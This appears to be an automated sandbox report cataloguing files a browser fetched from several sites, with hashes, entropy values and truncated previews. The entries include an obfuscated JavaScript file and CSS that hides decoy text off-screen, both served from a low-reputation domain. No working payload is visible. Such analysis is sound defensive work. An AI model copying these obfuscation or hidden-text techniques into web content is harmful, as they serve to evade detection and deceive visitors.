            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 26.5.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 865.2 255" style="enable-background:new 0 0 865.2 255;" xml:space="preserve">..<style type="text/css">....st0{fill-rule:evenodd;clip-rule:evenodd;fill:#FFFFFF;}..</style>..<g>...<path id="Combined-Shape" class="st0" d="M138.6,255c-33.4,0-60-9.9-79.7-29.7s-29.5-47-29.5-81.5V73.4c0-7.1-0.7-12.3-2.2-15.7....c-1.6-3.4-4.2-5.1-7.9-5.1c-3.2,0-5.7,0.9-7.4,2.6l-3.7-1.9L0,12.1l2.2-4.2c3.7-2.3,8.6-4.2,14.7-5.7C23,0.8,29.1,0,35.3,0....C52.2,0,65,5.2,74,15.5c8.9,10.3,13.4,25.3,13.4,45v85.9c0,17.4,4.6,31,13.8,40.9c9.2,9.8,21.7,14.8,37.5,14.8s28.4-4.9,37.7-14.8....c9.3-9.8,13.9-23.5,13.9-40.9V4.5h56.9v0.9h206.4v42.4L328.2,202.2H462V5.4h294.2c30.5,0,53.9,6.9,70.1,20.7....c16.3,13.8,24.4,32.9,24.4,57.3c0,16.6-4.6,30.8-13.7,42.8c-
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (951)
            Category:downloaded
            Size (bytes):952
            Entropy (8bit):5.086003380220007
            Encrypted:false
            SSDEEP:24:dnkaFfQFfpiVVDoneFVZtYNwE+Lmo4ot2owKgo/7:dnkaFfQFfpOVcneFFswE+LmvRNpu
            MD5:32FAC03C421DCBA16FB4A965FC089E7A
            SHA1:F6AC75910F20381D4478C1D302B4DD30FD1EE9AD
            SHA-256:F6170FBBEE0AF98D737510B5689B31D78CF4E9A152590E594175B79212210911
            SHA-512:DC554F5BD2C040133218F74A8CAF624789B2AFFF8505547899D91BFDD03B70EF5DEB7AC9834E255CAE9177C61E5344728B13A0546E956B723E65F5D1C4D3EFD8
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/f6170fbbtE5dP.css
            Preview:@keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loading-bgAnim 3s linear infinite;opacity:0;-webkit-user-select:none;-moz-user-select:none;user-select:none;pointer-events:none;transition:all .3s;z-index:999999999}.g-loading-mask.show{opacity:1;pointer-events:initial}.g-loading-mask .loading{width:38px;height:38px}html,body{padding:0;border:0;margin:0;overflow-x:hidden;overflow-y:auto;overflow:hidden auto}[data-t]{font-size:1em!important}[data-t]:after{content:attr(data-t) " "}[class^=_][class$=_]{color:transparent!important}[class^=_][class$=_]{display:inline-block;pointer-events:none;position:absolute;left:1000vw}[class^=_][class$=_]::-moz-selection{color:transparent!important}[class^=_][class$=_]::selection{color:transparent!important}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (1454)
            Category:downloaded
            Size (bytes):258442
            Entropy (8bit):4.801947861982761
            Encrypted:false
            SSDEEP:3072:OES30O8CAJjFs3OwPss3MwPwmez902xFM8MQO/X5AABpUsWhNek4LNTg/QKWVkp0:OES3EjBwwxFM8MQOryI
            MD5:DA9451015E8028AB71A4041375ADACF4
            SHA1:5AD4EB190C49FDBE710C2A83564B6598D4E6AF1C
            SHA-256:12F81BAFE6A9009EF22C01C5954AE780A72098131CEEF58F2AD4B7294B6AFEBF
            SHA-512:E9EABCDBA66959FA2665E724BD60F3FC619B6520A07B125A7C1C77C99D80003A416A4713936305CA9C97A6889AFABC5BE167278BEF2DDC72A9FF77BAA493DE4D
            Malicious:false
            Reputation:low
            URL:https://cdn.jsdelivr.net/npm/intl-tel-input@20.0.5/build/js/utils.js
            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=this||self;function k(a,b){a=a.split(".");var c=aa;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b}function m(a,b){function c(){}c.prototype=b.prototype;a.ma=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.sa=function(d,e,f){for(var g=Array(arguments.length-2),h=2;h<arguments.length;h++)g[h-2]=arguments[h];return b.prototype[e].apply(d,g)}};function ca(a){const b=[];let c=0;for(const d in a)b[c++]=a[d];return b};function da(a,b){this.g=a;this.l=!!b.aa;this.h=b.i;this.s=b.type;this.o=!1;switch(this.h){case ea:case fa:case ha:case ia:case ja:case ka:case la:this.o=!0}this.j=b.defaultValue}var la=1,ka=2,ea=3,fa=4,ha=6,ia=16,ja=18;function ma(a,b){this.h=a;this.g={};for(a=0;a<b.length;a++){var c=b[a];this.g[c.g]=c}}function na(a){a=ca(a.g);a.sort
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):14355
            Entropy (8bit):4.274057131627799
            Encrypted:false
            SSDEEP:384:1c5AJ5R2PugrvZlhPgzRC3fItouTdntz0zxNRm0Gk:1cCHRG4w3fItb47Rx
            MD5:A285FBD394AD0945F44F98DB3A7CBA67
            SHA1:18E804624CE2F1474F2A83BB863C72BFE1ACF05B
            SHA-256:3F321027E83D192F47931DE7BB7141C30FC2D6C1D87FDFAF3F3FE90B8804EED8
            SHA-512:47068094834F624617B564F9BD312C8BCDA987756C8FA902B2635BAEDE5DDAE29FC3A2EE3DB3625BF5F5FAE2770B6EB5E221DF599EC5C7D3A572C8BC9051EB6C
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="182px" height="31px" viewBox="0 0 182 31" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.48428887" y1="1.0148883" x2="0.51598674" y2="-0.014888338" id="gradient_1">.. <stop offset="0" stop-color="#009A44" />.. <stop offset="1" stop-color="#56C271" />.. </linearGradient>.. <linearGradient x1="-0.0007526911" y1="0.5000954" x2="1" y2="0.5000954" id="gradient_2">.. <stop offset="0" stop-color="#C5C5C5" />.. <stop offset="0.2" stop-color="#DADADA" />.. <stop offset="0.47" stop-color="#EEEEEE" />.. <stop offset="0.74" stop-color="#FBFBFB" />.. <stop offset="1" stop-color="#FFFFFF" />.. </linearGradient>.. <linearGradient x1="-0.00091793993" y1="0.50000405" x2="0.9996366" y2="0.50000405" id="gradient_3">.. <stop offset="0" stop-color="#FFFFFF" />.. <stop offset="0.26" stop-color="#FBFBFB" />.. <stop
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5552)
            Category:downloaded
            Size (bytes):77036
            Entropy (8bit):5.328453855577691
            Encrypted:false
            SSDEEP:1536:RJeUwT76HXhpwNCHM9ZK0BK01QJnYTZ02LKVsdmpyKcicy:RIT7OXDs9ZKAKBtYj8wKcHy
            MD5:2A88709F5260F30592422F09E3994FB2
            SHA1:FC465160D780585AAF110A74DDCADEA843BC3BE7
            SHA-256:22E11E43C7C03DE92FBC41E24B5E19FE0CE1BC2B45498B6CBE0502CE28B25690
            SHA-512:7C9047F3A8338D7F0223368EEBA68F9DBE7636C43D3C2AE015E9D0EEF8276153227ABE45D05AAB7FBCCBBE983B4F5F01196857117C0309A43712078E3B7100C6
            Malicious:false
            Reputation:low
            URL:https://connect.facebook.net/signals/config/303367017008635?v=2.9.168&r=stable&domain=www.servientrega.com&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111
            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):177765
            Entropy (8bit):7.964926271395501
            Encrypted:false
            SSDEEP:3072:rEwobnN+4WN4lwN6EDgCN61HYDmZECBjdT7qQRr/zn3cKmJvqw0Se/xIyZNkR:wwoTU4VIHEYDFgTOQRr/zcJyh/qyZNkR
            MD5:BAD39D54A8EC716451CF9931F87713C9
            SHA1:43BB7E324ED20B8EC0F500673C434C47CA246270
            SHA-256:C7A660D851BE4759B581127537F2FB76572D0015A28D1BFC7997C04160001853
            SHA-512:959EEE4E6B2BB072764F4C7E5E5AEA3FC9DA3CE0F4C158E5396F4F96B12757AB92A516710B33CCA9C23736B5DF7D020C88E29BA4C4F93C6B6217ECB5A037E1FB
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR..............{Oa....PLTE.......................................@q!.#.....................Cxx........".............-.....($0........H|-.......yxx...,,X.G~..........P...C>L...f....5..........L..*'AL.....:..=.......U.................l..42=TL[f..G..@..\..S...P..../..^...B}..E..D...............D...g`...:..~...&=....-d....BZ.4L%]zS..<..^cf.zX+......%:R_.Zmmn.~[.K...k6%..F}...{..U....3i.s..~C...........Ok......k....Gx.T.Kw......r..R...[..`..Ws.....H..;v.....a.b...$.l..Hes.....Vt..m...S.{z..!.tS.z..gg.La....a.:g..0.Uz.lh.cC......h..V<6......R...cy......vpl.......t...D....e.1.....^].D'.....t.Yi....8j.g..7R.'..|....z.........7..F...oy...zIQ.x...m;a9BF)0d...O..G...aE..(...U.!.....L3.(..V...........[.....U..}Iv..N.........5..\..un..&[...j..d...0.t....tRNS....8....IDATx..[..6...p4y.36....u...t.AYIm..6..@.ez....../../...o?...O.j..\h......o..ot...c...g7..K.*P..k..1.....l..P.........'.}...K.d|.:r...a..S{C<=.E.P....7.F_.nC.Vd.#
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2600), with no line terminators
            Category:downloaded
            Size (bytes):2600
            Entropy (8bit):5.295467569712814
            Encrypted:false
            SSDEEP:48:tb3ahj8h+hemBhSmf7GW0eZ3qjHrI9DLpUrHPHu4dAWLy+g8osF97ENPQD/+Cmi8:tbKhj8h+heuhPjGW0eZ3+8d1UPd3Ls4U
            MD5:F0E9F5C7967797E86881BE7F8B9C7E22
            SHA1:55738362ACCD8962FAF81C23B983CB6421A4FC7F
            SHA-256:FD81B500F1EAAD7672E42820E41B79CF21C661269A6D5D36BAFC4060E5955B33
            SHA-512:ABAEFCF1BCD8139CB7398BE49C9B4EA3729895A103E655A3CDF8DDDFA9996963D0F5AFC89ABB22A781B31E146D028DAB0D1AD13A4414FF46F8C8064B02D4F20F
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/00b63b5cajMSD.js
            Preview:(function(_0x87ecb3,_0x295b21){const _0x5402eb=a0_0x1f67,_0xcef53a=_0x87ecb3();while(!![]){try{const _0x4ad053=parseInt(_0x5402eb(0x18a))/0x1*(-parseInt(_0x5402eb(0x196))/0x2)+-parseInt(_0x5402eb(0x18f))/0x3+parseInt(_0x5402eb(0x188))/0x4+-parseInt(_0x5402eb(0x195))/0x5+parseInt(_0x5402eb(0x18c))/0x6*(parseInt(_0x5402eb(0x199))/0x7)+-parseInt(_0x5402eb(0x19d))/0x8+parseInt(_0x5402eb(0x198))/0x9;if(_0x4ad053===_0x295b21)break;else _0xcef53a['push'](_0xcef53a['shift']());}catch(_0x139e02){_0xcef53a['push'](_0xcef53a['shift']());}}}(a0_0x2bdb,0x2e994));const a0_0x2e640d=(function(){let _0x549c4d=!![];return function(_0x1dfb7e,_0xb2c38d){const _0x4d60ea=_0x549c4d?function(){const _0x267a22=a0_0x1f67;if(_0xb2c38d){const _0x4b912e=_0xb2c38d[_0x267a22(0x19e)](_0x1dfb7e,arguments);return _0xb2c38d=null,_0x4b912e;}}:function(){};return _0x549c4d=![],_0x4d60ea;};}()),a0_0x3fc55c=a0_0x2e640d(this,function(){const _0x346eff=a0_0x1f67;return a0_0x3fc55c[_0x346eff(0x191)]()[_0x346eff(0x189)](_0x346e
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):1555050
            Entropy (8bit):7.983623253130665
            Encrypted:false
            SSDEEP:24576:flIFJyPdACvQOgEmGAt9kCC8auvLIKhhfk2HfJMOdrJHNWpIZRMvC6SB3ZLW1s:LPO5GmGAtWj8aMLhhhzhMMt4pYmC621T
            MD5:85F5CBA3A78C833878CDC96647ABD9F1
            SHA1:B3EE6B99AB6934C4CC7A2E14E64FC0893E182D0A
            SHA-256:89C3D15B99B61D51BF751C233A39C42BE82BCB9D0109FA1A9775B27BD6C72866
            SHA-512:81EEECDBB7408C6CACFE902F60D916A9C19E2DFE388F74A6C30FEA855F7DC602F43104F9A1808299A4A8601336CBB0B68819A8293495D17B28FDC959669E7091
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port4.png
            Preview:.PNG........IHDR.............S< 9....pHYs.................sRGB.........gAMA......a.....IDATx....#..h.............`V..F..!.....;~f..Y.....L.+#..?B..9.9..?......u.<...s.z.s............*....k.D._.^...K.....Ff.AA}N.Kx...n...i._y~*.k.kHP..A.v.x.....)K.h...<fK......z.v..f..&.n.......+'...>.X6.....m.M.X.y..r.e.......q..&....Xc.A=&#8.l.s>^..}.z.....Mav.6...9..._........<....._....f./.`......5..n..9.j.....g./oe...........v.lc.....L{..vHb".......@~..GG..v.6.%{GJ......W.......?.A.o_....P...........(..Zrk>.5...iqR..6..80]....X..1q3...FR...sGX.6O|:.{..V.^.H.1.....c.._..<.3...........a.b.[<..$....>`..#,.<..c.X..~..5..d....0/.......<,E.i.....E...O.?....e...F._..~...F!9.....R.4..5......_......#...G....?.R.*.]......y.7./N.......q..5.....U.w.....]....3.........Y.......8O.W.....#..|..m..T...8...Vxz.-....8j.....8.EK.....V7.b.....'.`..j?Nf..C.q..G..9|...:.@../.'7....0f.XJ.uUM!}.[.B..X...-).g....u.k#..h....8.....IAc......vQ.A...H...'...T.7../....O.W.e..i.E.....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):1299
            Entropy (8bit):7.824363064103566
            Encrypted:false
            SSDEEP:24:yI+gu+f7uhDAOhLMloycmeIKLF9j/M9ZsCojHni/BN8Fs:Q+f7uhDAOhL2cXIoF9k9ZujHi/BNws
            MD5:71F203773F1C8DE693FE31E2680509B4
            SHA1:F1DD54112D5F61919BC16A7B5C8C228E18AF4FB8
            SHA-256:2D4E11241B243339B2EA18A5FEBF5B2E1F415BD1F8DB1C63D44F7926DC82300C
            SHA-512:58B0B78EB69780A0A7E5D87689EDD5FEB04CD2F20030861644EE1FFCBA0739F8C0CAB501A818F99334430C315B0F44F4F2714ACA78BACDE479957073534E1E68
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/wp_icon.png
            Preview:.PNG........IHDR...$...$.............sRGB.........IDATX..XKl.U.}w.....@.8q..B....).5....J...!$6|...`Q(+.(.$.*..BB,"..R ..T..I7.../.D.'NT(%j>t...5......H.{s...}.3.....o.vqu@Hy.$.MB.$~..~...I1+...7G.\j..P..`x{......3.....'+....I.[jw.S/6U...w.-h......XAg....Z...T.....<(.....!...N.d.M.....c.......$[WV..R....#'..h....Y..8..d..IL..v.F.....-J.N.$e.J#2.L.?.?.}..W.!./T.od$.c.P.{..S.Hh}5.....V_.\}../m.....Ix.[Sksk8..O.Ju...............wN.c.\.f..`...k...._........#z.J...X.7.9.T.O"u.YFP.lB....'1.&W|.m7y..>....gS@.~wsr86.......e8....v. iJ...V....p.QN1..oq..f.;a...X=2. .F-.....>.<.....abG.c..3..[xYB.{.+.'lu....R..F....=.7G.....H}.*...|..U..>...J.R./.r..U'.hz...VY#...S...U.....G..ok1...=uNH.>..UlM.o-R.S......P....N.t1.j..O.;.....Dk.b.)x......M.....6..+H.;..}.:....... ..Z.F_....+..3O...m8..`.:*..;.T.).k.V.gJ.*..8...<gW..%z5].......E...W...tJ.....J.9r.>N.@6q.{K..I.w.b8.......?..".a...]..:.]t.!.'...~cN..T.a.....-...n.......-,...;).Qn.B...F..#.<?R..e.{.#/.r.W...z
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2600), with no line terminators
            Category:dropped
            Size (bytes):2600
            Entropy (8bit):5.295467569712814
            Encrypted:false
            SSDEEP:48:tb3ahj8h+hemBhSmf7GW0eZ3qjHrI9DLpUrHPHu4dAWLy+g8osF97ENPQD/+Cmi8:tbKhj8h+heuhPjGW0eZ3+8d1UPd3Ls4U
            MD5:F0E9F5C7967797E86881BE7F8B9C7E22
            SHA1:55738362ACCD8962FAF81C23B983CB6421A4FC7F
            SHA-256:FD81B500F1EAAD7672E42820E41B79CF21C661269A6D5D36BAFC4060E5955B33
            SHA-512:ABAEFCF1BCD8139CB7398BE49C9B4EA3729895A103E655A3CDF8DDDFA9996963D0F5AFC89ABB22A781B31E146D028DAB0D1AD13A4414FF46F8C8064B02D4F20F
            Malicious:false
            Reputation:low
            Preview:(function(_0x87ecb3,_0x295b21){const _0x5402eb=a0_0x1f67,_0xcef53a=_0x87ecb3();while(!![]){try{const _0x4ad053=parseInt(_0x5402eb(0x18a))/0x1*(-parseInt(_0x5402eb(0x196))/0x2)+-parseInt(_0x5402eb(0x18f))/0x3+parseInt(_0x5402eb(0x188))/0x4+-parseInt(_0x5402eb(0x195))/0x5+parseInt(_0x5402eb(0x18c))/0x6*(parseInt(_0x5402eb(0x199))/0x7)+-parseInt(_0x5402eb(0x19d))/0x8+parseInt(_0x5402eb(0x198))/0x9;if(_0x4ad053===_0x295b21)break;else _0xcef53a['push'](_0xcef53a['shift']());}catch(_0x139e02){_0xcef53a['push'](_0xcef53a['shift']());}}}(a0_0x2bdb,0x2e994));const a0_0x2e640d=(function(){let _0x549c4d=!![];return function(_0x1dfb7e,_0xb2c38d){const _0x4d60ea=_0x549c4d?function(){const _0x267a22=a0_0x1f67;if(_0xb2c38d){const _0x4b912e=_0xb2c38d[_0x267a22(0x19e)](_0x1dfb7e,arguments);return _0xb2c38d=null,_0x4b912e;}}:function(){};return _0x549c4d=![],_0x4d60ea;};}()),a0_0x3fc55c=a0_0x2e640d(this,function(){const _0x346eff=a0_0x1f67;return a0_0x3fc55c[_0x346eff(0x191)]()[_0x346eff(0x189)](_0x346e
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1189
            Entropy (8bit):4.960460618230308
            Encrypted:false
            SSDEEP:24:2dcQ+9xJoeH4mFTt3Qeow6Y/aTMTXMGpFR8ZfpYplTuDbU/ewVR4WY2:cbe0nm1Jj6WXXV+fSVPX4y
            MD5:A7A96451EBDF70AA5F17172EE1EB7376
            SHA1:10F2ACF161E72FBDC18E631261C0F0A9DE04C51F
            SHA-256:C0C2438DDBF2DC191FF70846BCC30C579B71393B82C3C22C10D55AF8A242A3A0
            SHA-512:82FB50AED516CC407DC9D72630FA84223A856894CA68AAFC293C05FF511FC729875AC3339974FAE85D3A1F485A50DE297E4FF2154480FA73AD6544469CF3B209
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="27px" height="17px" viewBox="0 0 27 17" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="menu-(1)">.. <path d="M0.875252 1.61904L22.1541 1.61904C22.6373 1.61904 23.0294 1.25634 23.0294 0.809522C23.0294 0.362636 22.6372 0 22.1541 0L0.875252 0C0.392081 0 1.77376e-14 0.362704 1.77376e-14 0.809522C1.77376e-14 1.25634 0.392154 1.61904 0.875252 1.61904Z" transform="translate(3.970581 0)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M26.117 0L0.882973 0C0.395539 0 1.77982e-14 0.362704 1.77982e-14 0.809523C1.77982e-14 1.25634 0.395613 1.61905 0.882973 1.61905L26.117 1.61905C26.6044 1.61905 27 1.25634 27 0.809523C27 0.362704 26.6044 0 26.117 0Z" transform="translate(0 8.095215)" id="Path" fill="#FFFFFF" stroke="none" />.. <path d="M18.7086 0L0.938481 0C0.420405 0 -2.79474e-14 0.362704 -2.79474e-14 0.809522C-2.79474e-14 1.25641 0.420483 1.61904 0.938481 1.61904L18.7086 1.619
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):3099
            Entropy (8bit):7.7033789402601105
            Encrypted:false
            SSDEEP:48:d0CNn2rOvrJ3+C4hvYIYzEmFrPecJ4iJMmy1dkAxxJ2op3dZEDO92lHC:h2yAC4t2ESDecJerkJop39928
            MD5:A42EB6FE1E8AF192EC66CD32A2AD2E36
            SHA1:4C3FDFE9ACF0E1D23D05940B97633A23B9AEC573
            SHA-256:9799B3B47A360D72D033780C872DD3A777178E49934233B8377F92C71D21F448
            SHA-512:FF04E7F5FFE3A748E44CABFB9E2468B49DA935201727C2CF5A6165C75BABCE7C38F6B9AF7F1A5037AB728D3AFC8FC278F5CF786D4DA528CBC8859B3D5F2C5966
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmpMM:InstanceID="xmp.iid:3A45D12B11AE11EC9750AFFD84A37FFE" xmpMM:DocumentID="xmp.did:3A45D12C11AE11EC9750AFFD84A37FFE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3A45D12911AE11EC9750AFFD84A37FFE" stRef:documentID="xmp.did:3A45D12A11AE11EC9750AFFD84A37FFE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>9.Q.....IDATx.W{pT.......}%.,I.I .....GD(.Q...`.`)#.hm....N.:>@.P,#J.+..2..i.-.$:..i$4b..e.&.f7.......@.....f3..w
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 27824, version 1.0
            Category:downloaded
            Size (bytes):27824
            Entropy (8bit):7.992205463452374
            Encrypted:true
            SSDEEP:768:on/d4pqqWBoOAvg3UxP8Z1LmxHdlimj/L0HGH472SZy:onF4AFBoOARPssHxz0LZy
            MD5:225D39D1D4443E97F2AD20B9D91808FE
            SHA1:518045D265D6C388AC38DDE9FDEB364474A90787
            SHA-256:84221E6C0C5F950B44D38A40BC19FFA9A340B2A5D207CB6F6461B84D474F2555
            SHA-512:66899B2619C0C56329F73D3BFACA96749EE2E1B2261D729945BD7E4A807761DB72127D1137F853E0933CBBED51D80CED3078354D6ED2D1A4068D1FBC64CAFA64
            Malicious:false
            Reputation:low
            URL:https://fonts.gstatic.com/s/urbanist/v15/L0x-DF02iFML4hGCyMqlbS0.woff2
            Preview:wOF2......l...........l?................................l?HVAR.I.`?STAT.8'...V/~....$.c..p.0....6.$..\. ..`..Q.....%.^w..6.........w.......C..........I....n........`..O..}T..\..p.8..0c.>..Dt..k..hE.X.u.d....l...A.]...u.a...J...z.\....."m.....X6bR2....m&...v.7/.H7.0..p<......eU".......4.;.E6...V...5=....g.;.<...........9...#E.}....G...V....l.r...\.....@ A.(R%..f.-U..@..{^T..>....).nx~n=....N..v.n.....X.,......0..$......k.....y.V....bnU..{Q^t.......TT.A\1.F.j.-....3.."<0:..G.-.\i..B'.....s...hD.M ... .3...~..../.JD....Ga.y.....9b.!|....W...H.6.W.........R.].H...z^.x...X...7.... ...h...Y.......)..n.\.!T...;..N..4..V.....jc.[...G...I.%...|@P".:.g%-.c;...@b.....!..g..l.$..W.......6...I..A^..6+LU.q....._)x.?2sf..'y.......0."..=..r.....vT.3.=.i.n.!..vv...R.-P,4....#f@...6..(..(.......<..n......'.......}zS.....[\.yi.s...|...[.C.ci......A..@.-.R..Q7KR.}F/.K..x!G...(.H..y.A..!V)......E.K.+.....mU.2..p.9./p*A..~..6.M.3..M....p...h.An.....k...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1450
            Entropy (8bit):5.015913032797666
            Encrypted:false
            SSDEEP:24:2dUnjTxJ24apEvD41d02MwOd0vDtDDOOaFYb4apEvD41dEDZAMwOdaQGwyo6pUiK:cUjTVMvpDyOaJ0pLHvqX
            MD5:861946EDCA51B5DD1F3319A35D4CD17E
            SHA1:143DB14A398ED5B1AC71475C5C67142A595C5E88
            SHA-256:9583D70C1382D43CCAE85F3DDEDE41C68AEB67F377FF963D22EB2F8B407EF92C
            SHA-512:D66C8E644B955A7B91CD86B545CB1994642BA85C8B3F3B8070427D12FDFD3AD3B49B77BED45D987E985F12CF1EC07C6CC8D671D3E3882A1DD666452FE9FB4474
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="Group-23">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval" fill="#BFBFBF" fill-rule="evenodd" stroke="none" />.. <g id="youtube-(1)" transform="translate(4.791687 6.708252)">.. <path d="M10.8843 0L2.5324 0C1.12365 0 0 1.19834 0 2.66101L0 7.40149C0 8.88179 1.14042 10.0625 2.5324 10.0625L10.8843 10.0625C12.293 10.0625 13.4167 8.86416 13.4167 7.40149L13.4167 2.66101C13.4167 1.19834 12.2763 0 10.8843 0ZM4.9474 7.20764L4.9474 2.87248L8.46927 5.04006L4.9474 7.20764Z" id="Icon_23_" fill="#FFFFFF" stroke="none" />.. </g>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Oval-Copy" fill="#FF0000" fill-
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with very long lines (522), with CRLF line terminators
            Category:downloaded
            Size (bytes):73509
